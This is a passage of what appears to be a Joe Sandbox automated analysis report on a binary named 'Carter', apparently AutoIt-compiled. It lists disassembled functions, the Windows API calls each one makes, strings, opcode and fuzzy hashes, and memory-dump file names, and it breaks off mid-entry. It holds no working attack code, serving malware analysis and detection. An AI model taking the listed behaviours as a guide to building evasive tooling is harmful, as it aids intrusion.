Opcode Fuzzy Hash: feb687f0ff3c9944708e33aba446f255a911e25d43a2157c2e8eff2ce3a9c45c
Instruction Fuzzy Hash: 1FE01A76800604EFCB819F60D808BAE7BF5EF8C311F218059FD5AA7210DB3885559F54

Function 00C3068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C3068D
GetDC.USER32(00000000), ref: 00C30697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C306A3
ReleaseDC.USER32(?), ref: 00C306C4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: e9abb648639bf1f685faf3a97708b4d3e1f4eeb235807b500250a787e561cb0c
Instruction ID: 922a89b3a9e0cf0553f0164dda634cc40a10d718cc37e5cf97c38040100d8524
Opcode Fuzzy Hash: e9abb648639bf1f685faf3a97708b4d3e1f4eeb235807b500250a787e561cb0c
Instruction Fuzzy Hash: A2E01A76800204AFCB819F60D8087AE7BF1AF8C311F208058FE59A7210DB3895558F54

Function 00C5B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0436A: _wcscpy.LIBCMT ref: 00C0438D

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

__wcsnicmp.LIBCMT ref: 00C5B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C5B739

Strings

LPT, xrefs: 00C5B66A

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: b677cc6a6bdbe82368b7aec54cda79c895bc2d16697186c44a2622a254f2f002
Instruction ID: 37e0dcdcd8443b79dc5db0959c68f5e7e9ba42e34e9ad76d5384592d13e7943f
Opcode Fuzzy Hash: b677cc6a6bdbe82368b7aec54cda79c895bc2d16697186c44a2622a254f2f002
Instruction Fuzzy Hash: F5618479A00219EFCB14DF54C891EAEBBF4EF48310F104199F916AB391DB30AE84CB64

Function 00BFE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BFE01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00BFE037

Strings

@, xrefs: 00BFE02B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 16e10a9eacaa99f66b9cd6053fc658ebbd217b30fc1e340b21e7779f210c1bf3
Instruction ID: ac774d06a3d7cb10b1f35901e4286e831bcdd9a9318209ba3fce7dc84efb998c
Opcode Fuzzy Hash: 16e10a9eacaa99f66b9cd6053fc658ebbd217b30fc1e340b21e7779f210c1bf3
Instruction Fuzzy Hash: 305139714087489BE320AF50E886BAFB7F8FB84714F51489DF2D8421A1DB70992DCB16

Function 00C78096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00C78186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C7819B

Strings

', xrefs: 00C780EF

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 2323daeb3ce28ba4434ff7832060c13a79a3c2c4240de5f756cdb34707238e78
Instruction ID: 69a349db7d2fb20a9d9ee1c60be5e4b1c37b5c883e444a789b6eef8e37885af9
Opcode Fuzzy Hash: 2323daeb3ce28ba4434ff7832060c13a79a3c2c4240de5f756cdb34707238e78
Instruction Fuzzy Hash: B9410874A412099FDB14CF65C885BDE7BB5FB08300F50456AEE18AB391DB31A95ACF90

Function 00C62C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C62C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C62CA0

Strings

|, xrefs: 00C62C71

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: f1efa6154565bdcc6c53dce1f89ac2f51da356291599204e57bde36a56635468
Instruction ID: 91755e6deafac57d36fa7f5f52d83fd3e9885c197b036990325115b2afea8554
Opcode Fuzzy Hash: f1efa6154565bdcc6c53dce1f89ac2f51da356291599204e57bde36a56635468
Instruction Fuzzy Hash: 04313C71C00119ABCF11EFA1CC85AEEBFB9FF09314F144019FC15A6162DB319A56EBA0

Function 00C77088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C7713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C77178

Strings

static, xrefs: 00C770D8

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 0f8e6e58580317b465946af09777c16f87947da451b371a9df295e478d3914df
Instruction ID: 22282b0d9a890e85a9e09902b76595cfb591172b7f6864a446b6b3511a86694b
Opcode Fuzzy Hash: 0f8e6e58580317b465946af09777c16f87947da451b371a9df295e478d3914df
Instruction Fuzzy Hash: F231AD71100608AEEB109F78CC80BFB77A9FF88720F10D619F9A997190DB30AD95DB64

Function 00C53049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C530B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C530F3

Strings

0, xrefs: 00C530B1

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 7bd746196e0ac77e656038a845fc7eaff752ed589ec01cda86b9d1e24ffaac5b
Instruction ID: da63d9d6144999efe42ee6e53d157a99fd745a336e485a013ab47c84d8f6aae7
Opcode Fuzzy Hash: 7bd746196e0ac77e656038a845fc7eaff752ed589ec01cda86b9d1e24ffaac5b
Instruction Fuzzy Hash: 8031F7356003859BEB248F65C985BEFBBB8EF053C1F144019EC92A6191D7709BC8DB58

Function 00C640B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00C64132

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Strings

, $, xrefs: 00C64172
AUTOITCALLVARIABLE%d, xrefs: 00C64124

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 475afdc215a07e7e92969ba9fb11e6e5c74f2ca4a00dd22080a020c572380385
Instruction ID: dbb9e03a47244da6877f4a95059f58c4ec6034d7f8fceb9cd9d10fa1f78949be
Opcode Fuzzy Hash: 475afdc215a07e7e92969ba9fb11e6e5c74f2ca4a00dd22080a020c572380385
Instruction Fuzzy Hash: E9219131A0021DAFCF15EF64C891EAEB7B5EF56740F044464F905A7281DB30EA85EBA1

Function 00C76CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C76D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C76D91

Strings

Combobox, xrefs: 00C76D53

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: f952f5c59fb8f954e550ded2f458f28e422808c0649e468c92b457725e18cee7
Instruction ID: 18bba7c3826855155f71bea82c7c5da070d3e24822093713dae666586d4cd041
Opcode Fuzzy Hash: f952f5c59fb8f954e550ded2f458f28e422808c0649e468c92b457725e18cee7
Instruction Fuzzy Hash: F4119471320609BFEF219F54DC81FFB3B6BEB98364F118125F9289B290D6719D518760

Function 00C7722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00BF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF214F
Part of subcall function 00BF2111: GetStockObject.GDI32(00000011), ref: 00BF2163
Part of subcall function 00BF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF216D

GetWindowRect.USER32(00000000,?), ref: 00C77296
GetSysColor.USER32(00000012), ref: 00C772B0

Strings

static, xrefs: 00C77273

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 650757a02b3cdf0a5007ef8456f82b2a33d760bd4fc6c94820ba8b8fbdac89f3
Instruction ID: 5f01bbe3b2b351b4cc7a45c973014c0f3cda5272e1bc4a1c81d1852e67d11dbc
Opcode Fuzzy Hash: 650757a02b3cdf0a5007ef8456f82b2a33d760bd4fc6c94820ba8b8fbdac89f3
Instruction Fuzzy Hash: F721177261420AAFDB04DFA8CC45AFA7BA8EB08314F118658FD69E3251E635A8519B60

Function 00C76F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00C76FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C76FD6

Strings

edit, xrefs: 00C76FAB

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 1e5fcff4cde235e8f3e9f391bbbec4463ecad9dc56bb390c41d602065048939b
Instruction ID: 72e09915cab2df1b740ff8feccfc65e0d205b6ef7b3c48e7d967a074a3e12179
Opcode Fuzzy Hash: 1e5fcff4cde235e8f3e9f391bbbec4463ecad9dc56bb390c41d602065048939b
Instruction Fuzzy Hash: 0F116D71100609ABEB509EA4EC80FEB3B69EB05368F208714F978971E0C731DC54AB60

Function 00C53156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C531C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C531E8

Strings

0, xrefs: 00C531BF

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: ae5259a1004c47ce1b4ccd1b838b829562aa23fd54363640146193392d025e75
Instruction ID: beba387d67b7d0cb99e135512f3127079c6a5323917a085ac2ec644c61e4dd7c
Opcode Fuzzy Hash: ae5259a1004c47ce1b4ccd1b838b829562aa23fd54363640146193392d025e75
Instruction Fuzzy Hash: 77110B3A900554ABDB20DBA8DC45B9F77B8EB05391F140221EC25E7190D770EF4DDBA9

Function 00C628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C628F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C62921

Strings

<local>, xrefs: 00C628E9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 55617ba5e762ac2f385b1e2cd4d12c573169c86c2e82946e951a24f7b9dc805d
Instruction ID: 637236c1547b2551ba63342d5a2fe004c317751a53697043412aaa5e85b6ae93
Opcode Fuzzy Hash: 55617ba5e762ac2f385b1e2cd4d12c573169c86c2e82946e951a24f7b9dc805d
Instruction Fuzzy Hash: 9711E371501A25BAEB348F518CC8EBBFBACFF09351F10812AF55547180E3705954D6E0

Function 00C68475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C686E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00C6849D,?,00000000,?,?), ref: 00C686F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C684A0
htons.WSOCK32(00000000,?,00000000), ref: 00C684DD

Strings

255.255.255.255, xrefs: 00C684B8

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 019ef97e8164f9812fbc5dfcfa73e863eee012db8ceac5f2a2ac7e26d4342111
Instruction ID: f6e60967e43758ba958d8a306fc3375b8b007384bcf6f578a7a4041557dfc796
Opcode Fuzzy Hash: 019ef97e8164f9812fbc5dfcfa73e863eee012db8ceac5f2a2ac7e26d4342111
Instruction Fuzzy Hash: 2F11A575200206ABDB20AF64DC96FBEB324FF04710F108616F925572D1DF71A919DB55

Function 00C499BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C4B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C49A2B

Strings

ListBox, xrefs: 00C499F5
ComboBox, xrefs: 00C499CA

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: c38d9841b971f717367f283feda3af311a1565165676fd3a1ee52937720966a5
Instruction ID: 446cb2a7b8c4c7ce8c2e4eba0d3cb64c7bb51d615322233181f012cd4e112b84
Opcode Fuzzy Hash: c38d9841b971f717367f283feda3af311a1565165676fd3a1ee52937720966a5
Instruction Fuzzy Hash: 5701B171A42225ABDB14EBA4CC52DFEB369FF56320B140619FC72572C1EB309908E660

Function 00C5934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C59367
__fread_nolock.LIBCMT ref: 00C5937C

Strings

EA06, xrefs: 00C593AE

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 532a82f5b34faee2b6d5761ae9fc0283fd60b46ddcda7f95439c6b4a479ab62e
Instruction ID: f09d4dbcc70fe3060385c68c63722a2a09795da9c491fa551dead607ecda4a52
Opcode Fuzzy Hash: 532a82f5b34faee2b6d5761ae9fc0283fd60b46ddcda7f95439c6b4a479ab62e
Instruction Fuzzy Hash: 3601F972C04258BEDB18C7A8C856EFE7BF8DB06301F00419AF552D21C1E574E6489760

Function 00C498B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C4B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C49923

Strings

ListBox, xrefs: 00C498ED
ComboBox, xrefs: 00C498C2

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 084aaf1ffff4afffd8de0955e39ec3e4e5c9f2e62516db4ad71dea06c5b76cda
Instruction ID: 20f438a33f80b2eaba895e5af2dcdc5d09b02cdfbbb4c70ba84e2cc6ef5ca1a3
Opcode Fuzzy Hash: 084aaf1ffff4afffd8de0955e39ec3e4e5c9f2e62516db4ad71dea06c5b76cda
Instruction Fuzzy Hash: 6001A771F411157BDB14EBA0C952EFFB3A8EF15340F140119BC55632C1DA209F08E6B1

Function 00C4993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C4B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C499A6

Strings

ListBox, xrefs: 00C49972
ComboBox, xrefs: 00C49947

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 234565a7b0f19bb733261fecee9c3ae383a70871258f96c2fa6ea3c52dcc60fa
Instruction ID: 511122c8aa4c3a5d09cb5e544b2e6c026e39704a68249625e2591a6a985dcd7d
